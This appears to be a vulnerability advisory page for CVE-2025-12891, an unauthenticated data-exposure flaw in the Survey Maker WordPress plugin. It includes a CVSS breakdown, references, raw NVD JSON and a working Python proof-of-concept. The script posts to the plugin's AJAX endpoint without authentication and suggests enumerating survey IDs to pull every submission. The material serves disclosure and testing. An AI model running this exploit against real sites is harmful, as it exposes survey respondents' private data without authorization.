Security Vulnerability Report
CVE-2025-12891 CVSS 5.3 MEDIUM

CVE-2025-12891

Published: 2025-11-13 05:16:03
Last Modified: 2026-04-15 00:35:42

Description

The Survey Maker plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'ays_survey_show_results' AJAX endpoint in all versions up to, and including, 5.1.9.4. This makes it possible for unauthenticated attackers to view all survey submissions.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Survey Maker WordPress Plugin <= 5.1.9.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12891 PoC - Survey Maker Unauthenticated Survey Results Access
# Affected: Survey Maker plugin <= 5.1.9.4 for WordPress
import requests
import sys

TARGET_URL = input("Enter WordPress URL: ").rstrip('/')
SURVEY_ID = input("Enter Survey ID (numeric): ")

endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
}

# Craft the malicious request without any authentication
data = {
    'action': 'ays_survey_show_results',
    'id': SURVEY_ID
}

print(f"[*] Sending request to {endpoint}")
print(f"[*] Target Survey ID: {SURVEY_ID}")

try:
    response = requests.post(endpoint, data=data, headers=headers, timeout=30)
    if response.status_code == 200:
        print(f"[+] Request successful!")
        print(f"[+] Response length: {len(response.text)} bytes")
        print("\n--- Response Preview ---")
        print(response.text[:1000])
    else:
        print(f"[-] Request failed with status: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")
    sys.exit(1)

# Note: Enumerate survey IDs to access all survey submissions
print("\n[!] To enumerate all surveys, iterate through different ID values")

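References

https://plugins.trac.wordpress.org/changeset/3394078/survey-maker/tags/5.1.9.5/admin/class-survey-maker-admin.php?old=3389474&old_path=survey-maker%2Ftags%2F5.1.9.4%2Fadmin%2Fclass-survey-maker-admin.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/835353e7-871d-4daf-9ed4-86321daf2366?source=cve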

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12891", "sourceIdentifier": "[email protected]", "published": "2025-11-13T05:16:03.007", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Survey Maker plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'ays_survey_show_results' AJAX endpoint in all versions up to, and including, 5.1.9.4. This makes it possible for unauthenticated attackers to view all survey submissions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3394078/survey-maker/tags/5.1.9.5/admin/class-survey-maker-admin.php?old=3389474&old_path=survey-maker%2Ftags%2F5.1.9.4%2Fadmin%2Fclass-survey-maker-admin.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/835353e7-871d-4daf-9ed4-86321daf2366?source=cve", "source": "[email protected]"}]}}